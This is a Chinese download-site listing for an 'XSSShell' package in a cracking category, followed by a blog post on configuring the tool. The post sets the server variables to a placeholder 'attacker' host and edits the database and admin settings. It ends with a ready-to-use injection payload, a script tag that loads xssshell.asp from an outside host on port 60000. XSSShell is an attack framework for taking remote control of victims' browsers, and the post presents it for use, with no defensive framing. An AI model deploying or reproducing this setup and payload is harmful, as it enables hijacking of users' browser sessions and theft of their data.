XSSShell配置.txt
资源名称:xssshell.rar [点击查看]
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:1k
源码类别:
破解
开发平台:
ASP/ASPX
- XSSShell配置
- Posted by cince at 17:52 | Hacker | Comments(0) | Reads(73)
- Trackback URI:
- Note: The trackback url will expire after 23:59:59 today
- 1.XSSShell.asp的配置
- 打开xssshell.asp,找到“SERVER CONFIG”部分,代码如下所示。
- // You XSSShell Server
- var SERVER = "http://attacker/";
- // This file's name
- var ME = SERVER + "xssshell.asp?p=1" ;
- // Connector file (can be in php, cfm, pl etc. just stick with implementation)
- var CONNECTOR = SERVER + "xssshell/connector.asp";
- // Commands file (can be in php, cfm, pl etc. just stick with implementation)
- var COMMANDS_URL = SERVER + "xssshell/commands.asp";
- 2.XSSShell/db.asp的配置
- 这里主要修改数据库的路径和进入管理的密码。
- ' Password protection added
- Option Explicit
- '60 minutes
- Session.Timeout = 60
- 'Open In Live Enviroments
- 'On error resume next
- '// DATABASE CONFIGURATION
- Const DBPATH = "..dbshell.mdb"
- 'Activity check time as seconds
- Const Activity = "10"
- Const SQLSERVER = False
- 3.使用XSSShell:
- <script src="http://winjia.gicp.net:60000/xssshell.asp?v=336699"></script>